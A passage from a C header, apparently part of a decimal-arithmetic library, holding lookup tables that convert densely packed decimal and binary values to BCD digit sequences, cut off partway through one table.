'\3','5','8','8', '\3','5','8','9', '\3','5','9','0', '\3','5','9','1', '\3','5','9','2', '\3','5','9','3', '\3','5','9','4', '\3','5','9','5', '\3','5','9','6', '\3','5','9','7', '\3','5','9','8', '\3','5','9','9', '\3','6','0','0', '\3','6','0','1', '\3','6','0','2', '\3','6','0','3', '\3','6','0','4', '\3','6','0','5', '\3','6','0','6', '\3','6','0','7', '\3','6','0','8', '\3','6','0','9', '\3','6','1','0', '\3','6','1','1', '\3','6','1','2', '\3','6','1','3', '\3','6','1','4', '\3','6','1','5', '\3','6','1','6', '\3','6','1','7', '\3','6','1','8', '\3','6','1','9', '\3','6','2','0', '\3','6','2','1', '\3','6','2','2', '\3','6','2','3', '\3','6','2','4', '\3','6','2','5', '\3','6','2','6', '\3','6','2','7', '\3','6','2','8', '\3','6','2','9', '\3','6','3','0', '\3','6','3','1', '\3','6','3','2', '\3','6','3','3', '\3','6','3','4', '\3','6','3','5', '\3','6','3','6', '\3','6','3','7', '\3','6','3','8', '\3','6','3','9', '\3','6','4','0', '\3','6','4','1', '\3','6','4','2', '\3','6','4','3', '\3','6','4','4', '\3','6','4','5', '\3','6','4','6', '\3','6','4','7', '\3','6','4','8', '\3','6','4','9', '\3','6','5','0', '\3','6','5','1', '\3','6','5','2', '\3','6','5','3', '\3','6','5','4', '\3','6','5','5', '\3','6','5','6', '\3','6','5','7', '\3','6','5','8', '\3','6','5','9', '\3','6','6','0', '\3','6','6','1', '\3','6','6','2', '\3','6','6','3', '\3','6','6','4', '\3','6','6','5', '\3','6','6','6', '\3','6','6','7', '\3','6','6','8', '\3','6','6','9', '\3','6','7','0', '\3','6','7','1', '\3','6','7','2', '\3','6','7','3', '\3','6','7','4', '\3','6','7','5', '\3','6','7','6', '\3','6','7','7', '\3','6','7','8', '\3','6','7','9', '\3','6','8','0', '\3','6','8','1', '\3','6','8','2', '\3','6','8','3', '\3','6','8','4', '\3','6','8','5', '\3','6','8','6', '\3','6','8','7', '\3','6','8','8', '\3','6','8','9', '\3','6','9','0', '\3','6','9','1', '\3','6','9','2', '\3','6','9','3', '\3','6','9','4', '\3','6','9','5', '\3','6','9','6', '\3','6','9','7', '\3','6','9','8', '\3','6','9','9', '\3','7','0','0', '\3','7','0','1', '\3','7','0','2', '\3','7','0','3', '\3','7','0','4', '\3','7','0','5', '\3','7','0','6', '\3','7','0','7', '\3','7','0','8', '\3','7','0','9', '\3','7','1','0', '\3','7','1','1', '\3','7','1','2', '\3','7','1','3', '\3','7','1','4', '\3','7','1','5', '\3','7','1','6', '\3','7','1','7', '\3','7','1','8', '\3','7','1','9', '\3','7','2','0', '\3','7','2','1', '\3','7','2','2', '\3','7','2','3', '\3','7','2','4', '\3','7','2','5', '\3','7','2','6', '\3','7','2','7', '\3','7','2','8', '\3','7','2','9', '\3','7','3','0', '\3','7','3','1', '\3','7','3','2', '\3','7','3','3', '\3','7','3','4', '\3','7','3','5', '\3','7','3','6', '\3','7','3','7', '\3','7','3','8', '\3','7','3','9', '\3','7','4','0', '\3','7','4','1', '\3','7','4','2', '\3','7','4','3', '\3','7','4','4', '\3','7','4','5', '\3','7','4','6', '\3','7','4','7', '\3','7','4','8', '\3','7','4','9', '\3','7','5','0', '\3','7','5','1', '\3','7','5','2', '\3','7','5','3', '\3','7','5','4', '\3','7','5','5', '\3','7','5','6', '\3','7','5','7', '\3','7','5','8', '\3','7','5','9', '\3','7','6','0', '\3','7','6','1', '\3','7','6','2', '\3','7','6','3', '\3','7','6','4', '\3','7','6','5', '\3','7','6','6', '\3','7','6','7', '\3','7','6','8', '\3','7','6','9', '\3','7','7','0', '\3','7','7','1', '\3','7','7','2', '\3','7','7','3', '\3','7','7','4', '\3','7','7','5', '\3','7','7','6', '\3','7','7','7', '\3','7','7','8', '\3','7','7','9', '\3','7','8','0', '\3','7','8','1', '\3','7','8','2', '\3','7','8','3', '\3','7','8','4', '\3','7','8','5', '\3','7','8','6', '\3','7','8','7', '\3','7','8','8', '\3','7','8','9', '\3','7','9','0', '\3','7','9','1', '\3','7','9','2', '\3','7','9','3', '\3','7','9','4', '\3','7','9','5', '\3','7','9','6', '\3','7','9','7', '\3','7','9','8', '\3','7','9','9', '\3','8','0','0', '\3','8','0','1', '\3','8','0','2', '\3','8','0','3', '\3','8','0','4', '\3','8','0','5', '\3','8','0','6', '\3','8','0','7', '\3','8','0','8', '\3','8','0','9', '\3','8','1','0', '\3','8','1','1', '\3','8','1','2', '\3','8','1','3', '\3','8','1','4', '\3','8','1','5', '\3','8','1','6', '\3','8','1','7', '\3','8','1','8', '\3','8','1','9', '\3','8','2','0', '\3','8','2','1', '\3','8','2','2', '\3','8','2','3', '\3','8','2','4', '\3','8','2','5', '\3','8','2','6', '\3','8','2','7', '\3','8','2','8', '\3','8','2','9', '\3','8','3','0', '\3','8','3','1', '\3','8','3','2', '\3','8','3','3', '\3','8','3','4', '\3','8','3','5', '\3','8','3','6', '\3','8','3','7', '\3','8','3','8', '\3','8','3','9', '\3','8','4','0', '\3','8','4','1', '\3','8','4','2', '\3','8','4','3', '\3','8','4','4', '\3','8','4','5', '\3','8','4','6', '\3','8','4','7', '\3','8','4','8', '\3','8','4','9', '\3','8','5','0', '\3','8','5','1', '\3','8','5','2', '\3','8','5','3', '\3','8','5','4', '\3','8','5','5', '\3','8','5','6', '\3','8','5','7', '\3','8','5','8', '\3','8','5','9', '\3','8','6','0', '\3','8','6','1', '\3','8','6','2', '\3','8','6','3', '\3','8','6','4', '\3','8','6','5', '\3','8','6','6', '\3','8','6','7', '\3','8','6','8', '\3','8','6','9', '\3','8','7','0', '\3','8','7','1', '\3','8','7','2', '\3','8','7','3', '\3','8','7','4', '\3','8','7','5', '\3','8','7','6', '\3','8','7','7', '\3','8','7','8', '\3','8','7','9', '\3','8','8','0', '\3','8','8','1', '\3','8','8','2', '\3','8','8','3', '\3','8','8','4', '\3','8','8','5', '\3','8','8','6', '\3','8','8','7', '\3','8','8','8', '\3','8','8','9', '\3','8','9','0', '\3','8','9','1', '\3','8','9','2', '\3','8','9','3', '\3','8','9','4', '\3','8','9','5', '\3','8','9','6', '\3','8','9','7', '\3','8','9','8', '\3','8','9','9', '\3','9','0','0', '\3','9','0','1', '\3','9','0','2', '\3','9','0','3', '\3','9','0','4', '\3','9','0','5', '\3','9','0','6', '\3','9','0','7', '\3','9','0','8', '\3','9','0','9', '\3','9','1','0', '\3','9','1','1', '\3','9','1','2', '\3','9','1','3', '\3','9','1','4', '\3','9','1','5', '\3','9','1','6', '\3','9','1','7', '\3','9','1','8', '\3','9','1','9', '\3','9','2','0', '\3','9','2','1', '\3','9','2','2', '\3','9','2','3', '\3','9','2','4', '\3','9','2','5', '\3','9','2','6', '\3','9','2','7', '\3','9','2','8', '\3','9','2','9', '\3','9','3','0', '\3','9','3','1', '\3','9','3','2', '\3','9','3','3', '\3','9','3','4', '\3','9','3','5', '\3','9','3','6', '\3','9','3','7', '\3','9','3','8', '\3','9','3','9', '\3','9','4','0', '\3','9','4','1', '\3','9','4','2', '\3','9','4','3', '\3','9','4','4', '\3','9','4','5', '\3','9','4','6', '\3','9','4','7', '\3','9','4','8', '\3','9','4','9', '\3','9','5','0', '\3','9','5','1', '\3','9','5','2', '\3','9','5','3', '\3','9','5','4', '\3','9','5','5', '\3','9','5','6', '\3','9','5','7', '\3','9','5','8', '\3','9','5','9', '\3','9','6','0', '\3','9','6','1', '\3','9','6','2', '\3','9','6','3', '\3','9','6','4', '\3','9','6','5', '\3','9','6','6', '\3','9','6','7', '\3','9','6','8', '\3','9','6','9', '\3','9','7','0', '\3','9','7','1', '\3','9','7','2', '\3','9','7','3', '\3','9','7','4', '\3','9','7','5', '\3','9','7','6', '\3','9','7','7', '\3','9','7','8', '\3','9','7','9', '\3','9','8','0', '\3','9','8','1', '\3','9','8','2', '\3','9','8','3', '\3','9','8','4', '\3','9','8','5', '\3','9','8','6', '\3','9','8','7', '\3','9','8','8', '\3','9','8','9', '\3','9','9','0', '\3','9','9','1', '\3','9','9','2', '\3','9','9','3', '\3','9','9','4', '\3','9','9','5', '\3','9','9','6', '\3','9','9','7', '\3','9','9','8', '\3','9','9','9', '\0'}; #endif #if defined(DEC_DPD2BCD8) && DEC_DPD2BCD8==1 && !defined(DECDPD2BCD8) #define DECDPD2BCD8 const uint8_t DPD2BCD8[4096]={ 0,0,0,0, 0,0,1,1, 0,0,2,1, 0,0,3,1, 0,0,4,1, 0,0,5,1, 0,0,6,1, 0,0,7,1, 0,0,8,1, 0,0,9,1, 0,8,0,2, 0,8,1,2, 8,0,0,3, 8,0,1,3, 8,8,0,3, 8,8,1,3, 0,1,0,2, 0,1,1,2, 0,1,2,2, 0,1,3,2, 0,1,4,2, 0,1,5,2, 0,1,6,2, 0,1,7,2, 0,1,8,2, 0,1,9,2, 0,9,0,2, 0,9,1,2, 8,1,0,3, 8,1,1,3, 8,9,0,3, 8,9,1,3, 0,2,0,2, 0,2,1,2, 0,2,2,2, 0,2,3,2, 0,2,4,2, 0,2,5,2, 0,2,6,2, 0,2,7,2, 0,2,8,2, 0,2,9,2, 0,8,2,2, 0,8,3,2, 8,2,0,3, 8,2,1,3, 8,0,8,3, 8,0,9,3, 0,3,0,2, 0,3,1,2, 0,3,2,2, 0,3,3,2, 0,3,4,2, 0,3,5,2, 0,3,6,2, 0,3,7,2, 0,3,8,2, 0,3,9,2, 0,9,2,2, 0,9,3,2, 8,3,0,3, 8,3,1,3, 8,1,8,3, 8,1,9,3, 0,4,0,2, 0,4,1,2, 0,4,2,2, 0,4,3,2, 0,4,4,2, 0,4,5,2, 0,4,6,2, 0,4,7,2, 0,4,8,2, 0,4,9,2, 0,8,4,2, 0,8,5,2, 8,4,0,3, 8,4,1,3, 0,8,8,2, 0,8,9,2, 0,5,0,2, 0,5,1,2, 0,5,2,2, 0,5,3,2, 0,5,4,2, 0,5,5,2, 0,5,6,2, 0,5,7,2, 0,5,8,2, 0,5,9,2, 0,9,4,2, 0,9,5,2, 8,5,0,3, 8,5,1,3, 0,9,8,2, 0,9,9,2, 0,6,0,2, 0,6,1,2, 0,6,2,2, 0,6,3,2, 0,6,4,2, 0,6,5,2, 0,6,6,2, 0,6,7,2, 0,6,8,2, 0,6,9,2, 0,8,6,2, 0,8,7,2, 8,6,0,3, 8,6,1,3, 8,8,8,3, 8,8,9,3, 0,7,0,2, 0,7,1,2, 0,7,2,2, 0,7,3,2, 0,7,4,2, 0,7,5,2, 0,7,6,2, 0,7,7,2, 0,7,8,2, 0,7,9,2, 0,9,6,2, 0,9,7,2, 8,7,0,3, 8,7,1,3, 8,9,8,3, 8,9,9,3, 1,0,0,3, 1,0,1,3, 1,0,2,3, 1,0,3,3, 1,0,4,3, 1,0,5,3, 1,0,6,3, 1,0,7,3, 1,0,8,3, 1,0,9,3, 1,8,0,3, 1,8,1,3, 9,0,0,3, 9,0,1,3, 9,8,0,3, 9,8,1,3, 1,1,0,3, 1,1,1,3, 1,1,2,3, 1,1,3,3, 1,1,4,3, 1,1,5,3, 1,1,6,3, 1,1,7,3, 1,1,8,3, 1,1,9,3, 1,9,0,3, 1,9,1,3, 9,1,0,3, 9,1,1,3, 9,9,0,3, 9,9,1,3, 1,2,0,3, 1,2,1,3, 1,2,2,3, 1,2,3,3, 1,2,4,3, 1,2,5,3, 1,2,6,3, 1,2,7,3, 1,2,8,3, 1,2,9,3, 1,8,2,3, 1,8,3,3, 9,2,0,3, 9,2,1,3, 9,0,8,3, 9,0,9,3, 1,3,0,3, 1,3,1,3, 1,3,2,3, 1,3,3,3, 1,3,4,3, 1,3,5,3, 1,3,6,3, 1,3,7,3, 1,3,8,3, 1,3,9,3, 1,9,2,3, 1,9,3,3, 9,3,0,3, 9,3,1,3, 9,1,8,3, 9,1,9,3, 1,4,0,3, 1,4,1,3, 1,4,2,3, 1,4,3,3, 1,4,4,3, 1,4,5,3, 1,4,6,3, 1,4,7,3, 1,4,8,3, 1,4,9,3, 1,8,4,3, 1,8,5,3, 9,4,0,3, 9,4,1,3, 1,8,8,3, 1,8,9,3, 1,5,0,3, 1,5,1,3, 1,5,2,3, 1,5,3,3, 1,5,4,3, 1,5,5,3, 1,5,6,3, 1,5,7,3, 1,5,8,3, 1,5,9,3, 1,9,4,3, 1,9,5,3, 9,5,0,3, 9,5,1,3, 1,9,8,3, 1,9,9,3, 1,6,0,3, 1,6,1,3, 1,6,2,3, 1,6,3,3, 1,6,4,3, 1,6,5,3, 1,6,6,3, 1,6,7,3, 1,6,8,3, 1,6,9,3, 1,8,6,3, 1,8,7,3, 9,6,0,3, 9,6,1,3, 9,8,8,3, 9,8,9,3, 1,7,0,3, 1,7,1,3, 1,7,2,3, 1,7,3,3, 1,7,4,3, 1,7,5,3, 1,7,6,3, 1,7,7,3, 1,7,8,3, 1,7,9,3, 1,9,6,3, 1,9,7,3, 9,7,0,3, 9,7,1,3, 9,9,8,3, 9,9,9,3, 2,0,0,3, 2,0,1,3, 2,0,2,3, 2,0,3,3, 2,0,4,3, 2,0,5,3, 2,0,6,3, 2,0,7,3, 2,0,8,3, 2,0,9,3, 2,8,0,3, 2,8,1,3, 8,0,2,3, 8,0,3,3, 8,8,2,3, 8,8,3,3, 2,1,0,3, 2,1,1,3, 2,1,2,3, 2,1,3,3, 2,1,4,3, 2,1,5,3, 2,1,6,3, 2,1,7,3, 2,1,8,3, 2,1,9,3, 2,9,0,3, 2,9,1,3, 8,1,2,3, 8,1,3,3, 8,9,2,3, 8,9,3,3, 2,2,0,3, 2,2,1,3, 2,2,2,3, 2,2,3,3, 2,2,4,3, 2,2,5,3, 2,2,6,3, 2,2,7,3, 2,2,8,3, 2,2,9,3, 2,8,2,3, 2,8,3,3, 8,2,2,3, 8,2,3,3, 8,2,8,3, 8,2,9,3, 2,3,0,3, 2,3,1,3, 2,3,2,3, 2,3,3,3, 2,3,4,3, 2,3,5,3, 2,3,6,3, 2,3,7,3, 2,3,8,3, 2,3,9,3, 2,9,2,3, 2,9,3,3, 8,3,2,3, 8,3,3,3, 8,3,8,3, 8,3,9,3, 2,4,0,3, 2,4,1,3, 2,4,2,3, 2,4,3,3, 2,4,4,3, 2,4,5,3, 2,4,6,3, 2,4,7,3, 2,4,8,3, 2,4,9,3, 2,8,4,3, 2,8,5,3, 8,4,2,3, 8,4,3,3, 2,8,8,3, 2,8,9,3, 2,5,0,3, 2,5,1,3, 2,5,2,3, 2,5,3,3, 2,5,4,3, 2,5,5,3, 2,5,6,3, 2,5,7,3, 2,5,8,3, 2,5,9,3, 2,9,4,3, 2,9,5,3, 8,5,2,3, 8,5,3,3, 2,9,8,3, 2,9,9,3, 2,6,0,3, 2,6,1,3, 2,6,2,3, 2,6,3,3, 2,6,4,3, 2,6,5,3, 2,6,6,3, 2,6,7,3, 2,6,8,3, 2,6,9,3, 2,8,6,3, 2,8,7,3, 8,6,2,3, 8,6,3,3, 8,8,8,3, 8,8,9,3, 2,7,0,3, 2,7,1,3, 2,7,2,3, 2,7,3,3, 2,7,4,3, 2,7,5,3, 2,7,6,3, 2,7,7,3, 2,7,8,3, 2,7,9,3, 2,9,6,3, 2,9,7,3, 8,7,2,3, 8,7,3,3, 8,9,8,3, 8,9,9,3, 3,0,0,3, 3,0,1,3, 3,0,2,3, 3,0,3,3, 3,0,4,3, 3,0,5,3, 3,0,6,3, 3,0,7,3, 3,0,8,3, 3,0,9,3, 3,8,0,3, 3,8,1,3, 9,0,2,3, 9,0,3,3, 9,8,2,3, 9,8,3,3, 3,1,0,3, 3,1,1,3, 3,1,2,3, 3,1,3,3, 3,1,4,3, 3,1,5,3, 3,1,6,3, 3,1,7,3, 3,1,8,3, 3,1,9,3, 3,9,0,3, 3,9,1,3, 9,1,2,3, 9,1,3,3, 9,9,2,3, 9,9,3,3, 3,2,0,3, 3,2,1,3, 3,2,2,3, 3,2,3,3, 3,2,4,3, 3,2,5,3, 3,2,6,3, 3,2,7,3, 3,2,8,3, 3,2,9,3, 3,8,2,3, 3,8,3,3, 9,2,2,3, 9,2,3,3, 9,2,8,3, 9,2,9,3, 3,3,0,3, 3,3,1,3, 3,3,2,3, 3,3,3,3, 3,3,4,3, 3,3,5,3, 3,3,6,3, 3,3,7,3, 3,3,8,3, 3,3,9,3, 3,9,2,3, 3,9,3,3, 9,3,2,3, 9,3,3,3, 9,3,8,3, 9,3,9,3, 3,4,0,3, 3,4,1,3, 3,4,2,3, 3,4,3,3, 3,4,4,3, 3,4,5,3, 3,4,6,3, 3,4,7,3, 3,4,8,3, 3,4,9,3, 3,8,4,3, 3,8,5,3, 9,4,2,3, 9,4,3,3, 3,8,8,3, 3,8,9,3, 3,5,0,3, 3,5,1,3, 3,5,2,3, 3,5,3,3, 3,5,4,3, 3,5,5,3, 3,5,6,3, 3,5,7,3, 3,5,8,3, 3,5,9,3, 3,9,4,3, 3,9,5,3, 9,5,2,3, 9,5,3,3, 3,9,8,3, 3,9,9,3, 3,6,0,3, 3,6,1,3, 3,6,2,3, 3,6,3,3, 3,6,4,3, 3,6,5,3, 3,6,6,3, 3,6,7,3, 3,6,8,3, 3,6,9,3, 3,8,6,3, 3,8,7,3, 9,6,2,3, 9,6,3,3, 9,8,8,3, 9,8,9,3, 3,7,0,3, 3,7,1,3, 3,7,2,3, 3,7,3,3, 3,7,4,3, 3,7,5,3, 3,7,6,3, 3,7,7,3, 3,7,8,3, 3,7,9,3, 3,9,6,3, 3,9,7,3, 9,7,2,3, 9,7,3,3, 9,9,8,3, 9,9,9,3, 4,0,0,3, 4,0,1,3, 4,0,2,3, 4,0,3,3, 4,0,4,3, 4,0,5,3, 4,0,6,3, 4,0,7,3, 4,0,8,3, 4,0,9,3, 4,8,0,3, 4,8,1,3, 8,0,4,3, 8,0,5,3, 8,8,4,3, 8,8,5,3, 4,1,0,3, 4,1,1,3, 4,1,2,3, 4,1,3,3, 4,1,4,3, 4,1,5,3, 4,1,6,3, 4,1,7,3, 4,1,8,3, 4,1,9,3, 4,9,0,3, 4,9,1,3, 8,1,4,3, 8,1,5,3, 8,9,4,3, 8,9,5,3, 4,2,0,3, 4,2,1,3, 4,2,2,3, 4,2,3,3, 4,2,4,3, 4,2,5,3, 4,2,6,3, 4,2,7,3, 4,2,8,3, 4,2,9,3, 4,8,2,3, 4,8,3,3, 8,2,4,3, 8,2,5,3, 8,4,8,3, 8,4,9,3, 4,3,0,3, 4,3,1,3, 4,3,2,3, 4,3,3,3, 4,3,4,3, 4,3,5,3, 4,3,6,3, 4,3,7,3, 4,3,8,3, 4,3,9,3, 4,9,2,3, 4,9,3,3, 8,3,4,3, 8,3,5,3, 8,5,8,3, 8,5,9,3, 4,4,0,3, 4,4,1,3, 4,4,2,3, 4,4,3,3, 4,4,4,3, 4,4,5,3, 4,4,6,3, 4,4,7,3, 4,4,8,3, 4,4,9,3, 4,8,4,3, 4,8,5,3, 8,4,4,3, 8,4,5,3, 4,8,8,3, 4,8,9,3, 4,5,0,3, 4,5,1,3, 4,5,2,3, 4,5,3,3, 4,5,4,3, 4,5,5,3, 4,5,6,3, 4,5,7,3, 4,5,8,3, 4,5,9,3, 4,9,4,3, 4,9,5,3, 8,5,4,3, 8,5,5,3, 4,9,8,3, 4,9,9,3, 4,6,0,3, 4,6,1,3, 4,6,2,3, 4,6,3,3, 4,6,4,3, 4,6,5,3, 4,6,6,3, 4,6,7,3, 4,6,8,3, 4,6,9,3, 4,8,6,3, 4,8,7,3, 8,6,4,3, 8,6,5,3, 8,8,8,3, 8,8,9,3, 4,7,0,3, 4,7,1,3, 4,7,2,3, 4,7,3,3, 4,7,4,3, 4,7,5,3, 4,7,6,3, 4,7,7,3, 4,7,8,3, 4,7,9,3, 4,9,6,3, 4,9,7,3, 8,7,4,3, 8,7,5,3, 8,9,8,3, 8,9,9,3, 5,0,0,3, 5,0,1,3, 5,0,2,3, 5,0,3,3, 5,0,4,3, 5,0,5,3, 5,0,6,3, 5,0,7,3, 5,0,8,3, 5,0,9,3, 5,8,0,3, 5,8,1,3, 9,0,4,3, 9,0,5,3, 9,8,4,3, 9,8,5,3, 5,1,0,3, 5,1,1,3, 5,1,2,3, 5,1,3,3, 5,1,4,3, 5,1,5,3, 5,1,6,3, 5,1,7,3, 5,1,8,3, 5,1,9,3, 5,9,0,3, 5,9,1,3, 9,1,4,3, 9,1,5,3, 9,9,4,3, 9,9,5,3, 5,2,0,3, 5,2,1,3, 5,2,2,3, 5,2,3,3, 5,2,4,3, 5,2,5,3, 5,2,6,3, 5,2,7,3, 5,2,8,3, 5,2,9,3, 5,8,2,3, 5,8,3,3, 9,2,4,3, 9,2,5,3, 9,4,8,3, 9,4,9,3, 5,3,0,3, 5,3,1,3, 5,3,2,3, 5,3,3,3, 5,3,4,3, 5,3,5,3, 5,3,6,3, 5,3,7,3, 5,3,8,3, 5,3,9,3, 5,9,2,3, 5,9,3,3, 9,3,4,3, 9,3,5,3, 9,5,8,3, 9,5,9,3, 5,4,0,3, 5,4,1,3, 5,4,2,3, 5,4,3,3, 5,4,4,3, 5,4,5,3, 5,4,6,3, 5,4,7,3, 5,4,8,3, 5,4,9,3, 5,8,4,3, 5,8,5,3, 9,4,4,3, 9,4,5,3, 5,8,8,3, 5,8,9,3, 5,5,0,3, 5,5,1,3, 5,5,2,3, 5,5,3,3, 5,5,4,3, 5,5,5,3, 5,5,6,3, 5,5,7,3, 5,5,8,3, 5,5,9,3, 5,9,4,3, 5,9,5,3, 9,5,4,3, 9,5,5,3, 5,9,8,3, 5,9,9,3, 5,6,0,3, 5,6,1,3, 5,6,2,3, 5,6,3,3, 5,6,4,3, 5,6,5,3, 5,6,6,3, 5,6,7,3, 5,6,8,3, 5,6,9,3, 5,8,6,3, 5,8,7,3, 9,6,4,3, 9,6,5,3, 9,8,8,3, 9,8,9,3, 5,7,0,3, 5,7,1,3, 5,7,2,3, 5,7,3,3, 5,7,4,3, 5,7,5,3, 5,7,6,3, 5,7,7,3, 5,7,8,3, 5,7,9,3, 5,9,6,3, 5,9,7,3, 9,7,4,3, 9,7,5,3, 9,9,8,3, 9,9,9,3, 6,0,0,3, 6,0,1,3, 6,0,2,3, 6,0,3,3, 6,0,4,3, 6,0,5,3, 6,0,6,3, 6,0,7,3, 6,0,8,3, 6,0,9,3, 6,8,0,3, 6,8,1,3, 8,0,6,3, 8,0,7,3, 8,8,6,3, 8,8,7,3, 6,1,0,3, 6,1,1,3, 6,1,2,3, 6,1,3,3, 6,1,4,3, 6,1,5,3, 6,1,6,3, 6,1,7,3, 6,1,8,3, 6,1,9,3, 6,9,0,3, 6,9,1,3, 8,1,6,3, 8,1,7,3, 8,9,6,3, 8,9,7,3, 6,2,0,3, 6,2,1,3, 6,2,2,3, 6,2,3,3, 6,2,4,3, 6,2,5,3, 6,2,6,3, 6,2,7,3, 6,2,8,3, 6,2,9,3, 6,8,2,3, 6,8,3,3, 8,2,6,3, 8,2,7,3, 8,6,8,3, 8,6,9,3, 6,3,0,3, 6,3,1,3, 6,3,2,3, 6,3,3,3, 6,3,4,3, 6,3,5,3, 6,3,6,3, 6,3,7,3, 6,3,8,3, 6,3,9,3, 6,9,2,3, 6,9,3,3, 8,3,6,3, 8,3,7,3, 8,7,8,3, 8,7,9,3, 6,4,0,3, 6,4,1,3, 6,4,2,3, 6,4,3,3, 6,4,4,3, 6,4,5,3, 6,4,6,3, 6,4,7,3, 6,4,8,3, 6,4,9,3, 6,8,4,3, 6,8,5,3, 8,4,6,3, 8,4,7,3, 6,8,8,3, 6,8,9,3, 6,5,0,3, 6,5,1,3, 6,5,2,3, 6,5,3,3, 6,5,4,3, 6,5,5,3, 6,5,6,3, 6,5,7,3, 6,5,8,3, 6,5,9,3, 6,9,4,3, 6,9,5,3, 8,5,6,3, 8,5,7,3, 6,9,8,3, 6,9,9,3, 6,6,0,3, 6,6,1,3, 6,6,2,3, 6,6,3,3, 6,6,4,3, 6,6,5,3, 6,6,6,3, 6,6,7,3, 6,6,8,3, 6,6,9,3, 6,8,6,3, 6,8,7,3, 8,6,6,3, 8,6,7,3, 8,8,8,3, 8,8,9,3, 6,7,0,3, 6,7,1,3, 6,7,2,3, 6,7,3,3, 6,7,4,3, 6,7,5,3, 6,7,6,3, 6,7,7,3, 6,7,8,3, 6,7,9,3, 6,9,6,3, 6,9,7,3, 8,7,6,3, 8,7,7,3, 8,9,8,3, 8,9,9,3, 7,0,0,3, 7,0,1,3, 7,0,2,3, 7,0,3,3, 7,0,4,3, 7,0,5,3, 7,0,6,3, 7,0,7,3, 7,0,8,3, 7,0,9,3, 7,8,0,3, 7,8,1,3, 9,0,6,3, 9,0,7,3, 9,8,6,3, 9,8,7,3, 7,1,0,3, 7,1,1,3, 7,1,2,3, 7,1,3,3, 7,1,4,3, 7,1,5,3, 7,1,6,3, 7,1,7,3, 7,1,8,3, 7,1,9,3, 7,9,0,3, 7,9,1,3, 9,1,6,3, 9,1,7,3, 9,9,6,3, 9,9,7,3, 7,2,0,3, 7,2,1,3, 7,2,2,3, 7,2,3,3, 7,2,4,3, 7,2,5,3, 7,2,6,3, 7,2,7,3, 7,2,8,3, 7,2,9,3, 7,8,2,3, 7,8,3,3, 9,2,6,3, 9,2,7,3, 9,6,8,3, 9,6,9,3, 7,3,0,3, 7,3,1,3, 7,3,2,3, 7,3,3,3, 7,3,4,3, 7,3,5,3, 7,3,6,3, 7,3,7,3, 7,3,8,3, 7,3,9,3, 7,9,2,3, 7,9,3,3, 9,3,6,3, 9,3,7,3, 9,7,8,3, 9,7,9,3, 7,4,0,3, 7,4,1,3, 7,4,2,3, 7,4,3,3, 7,4,4,3, 7,4,5,3, 7,4,6,3, 7,4,7,3, 7,4,8,3, 7,4,9,3, 7,8,4,3, 7,8,5,3, 9,4,6,3, 9,4,7,3, 7,8,8,3, 7,8,9,3, 7,5,0,3, 7,5,1,3, 7,5,2,3, 7,5,3,3, 7,5,4,3, 7,5,5,3, 7,5,6,3, 7,5,7,3, 7,5,8,3, 7,5,9,3, 7,9,4,3, 7,9,5,3, 9,5,6,3, 9,5,7,3, 7,9,8,3, 7,9,9,3, 7,6,0,3, 7,6,1,3, 7,6,2,3, 7,6,3,3, 7,6,4,3, 7,6,5,3, 7,6,6,3, 7,6,7,3, 7,6,8,3, 7,6,9,3, 7,8,6,3, 7,8,7,3, 9,6,6,3, 9,6,7,3, 9,8,8,3, 9,8,9,3, 7,7,0,3, 7,7,1,3, 7,7,2,3, 7,7,3,3, 7,7,4,3, 7,7,5,3, 7,7,6,3, 7,7,7,3, 7,7,8,3, 7,7,9,3, 7,9,6,3, 7,9,7,3, 9,7,6,3, 9,7,7,3, 9,9,8,3, 9,9,9,3}; #endif #if defined(DEC_BIN2BCD8) && DEC_BIN2BCD8==1 && !defined(DECBIN2BCD8) #define DECBIN2BCD8 const uint8_t BIN2BCD8[4000]={ 0,0,0,0, 0,0,1,1, 0,0,2,1, 0,0,3,1, 0,0,4,1, 0,0,5,1, 0,0,6,1, 0,0,7,1, 0,0,8,1, 0,0,9,1, 0,1,0,2, 0,1,1,2, 0,1,2,2, 0,1,3,2, 0,1,4,2, 0,1,5,2, 0,1,6,2, 0,1,7,2, 0,1,8,2, 0,1,9,2, 0,2,0,2, 0,2,1,2, 0,2,2,2, 0,2,3,2, 0,2,4,2, 0,2,5,2, 0,2,6,2, 0,2,7,2, 0,2,8,2, 0,2,9,2, 0,3,0,2, 0,3,1,2, 0,3,2,2, 0,3,3,2, 0,3,4,2, 0,3,5,2, 0,3,6,2, 0,3,7,2, 0,3,8,2, 0,3,9,2, 0,4,0,2, 0,4,1,2, 0,4,2,2, 0,4,3,2, 0,4,4,2, 0,4,5,2, 0,4,6,2, 0,4,7,2, 0,4,8,2, 0,4,9,2, 0,5,0,2, 0,5,1,2, 0,5,2,2, 0,5,3,2, 0,5,4,2, 0,5,5,2, 0,5,6,2, 0,5,7,2, 0,5,8,2, 0,5,9,2, 0,6,0,2, 0,6,1,2, 0,6,2,2, 0,6,3,2, 0,6,4,2, 0,6,5,2, 0,6,6,2, 0,6,7,2, 0,6,8,2, 0,6,9,2, 0,7,0,2, 0,7,1,2, 0,7,2,2, 0,7,3,2, 0,7,4,2, 0,7,5,2, 0,7,6,2, 0,7,7,2, 0,7,8,2, 0,7,9,2, 0,8,0,2, 0,8,1,2, 0,8,2,2, 0,8,3,2, 0,8,4,2, 0,8,5,2, 0,8,6,2, 0,8,7,2, 0,8,8,2, 0,8,9,2, 0,9,0,2, 0,9,1,2, 0,9,2,2, 0,9,3,2, 0,9,4,2, 0,9,5,2, 0,9,6,2, 0,9,7,2, 0,9,8,2, 0,9,9,2, 1,0,0,3, 1,0,1,3, 1,0,2,3, 1,0,3,3, 1,0,4,3, 1,0,5,3, 1,0,6,3, 1,0,7,3, 1,0,8,3, 1,0,9,3, 1,1,0,3, 1,1,1,3, 1,1,2,3, 1,1,3,3, 1,1,4,3, 1,1,5,3, 1,1,6,3, 1,1,7,3, 1,1,8,3, 1,1,9,3, 1,2,0,3, 1,2,1,3, 1,2,2,3, 1,2,3,3, 1,2,4,3, 1,2,5,3, 1,2,6,3, 1,2,7,3, 1,2,8,3, 1,2,9,3, 1,3,0,3, 1,3,1,3, 1,3,2,3, 1,3,3,3, 1,3,4,3, 1,3,5,3, 1,3,6,3, 1,3,7,3, 1,3,8,3, 1,3,9,3, 1,4,0,3, 1,4,1,3, 1,4,2,3, 1,4,3,3, 1,4,4,3, 1,4,5,3, 1,4,6,3, 1,4,7,3, 1,4,8,3, 1,4,9,3, 1,5,0,3, 1,5,1,3, 1,5,2,3, 1,5,3,3, 1,5,4,3, 1,5,5,3, 1,5,6,3, 1,5,7,3, 1,5,8,3, 1,5,9,3, 1,6,0,3, 1,6,1,3, 1,6,2,3, 1,6,3,3, 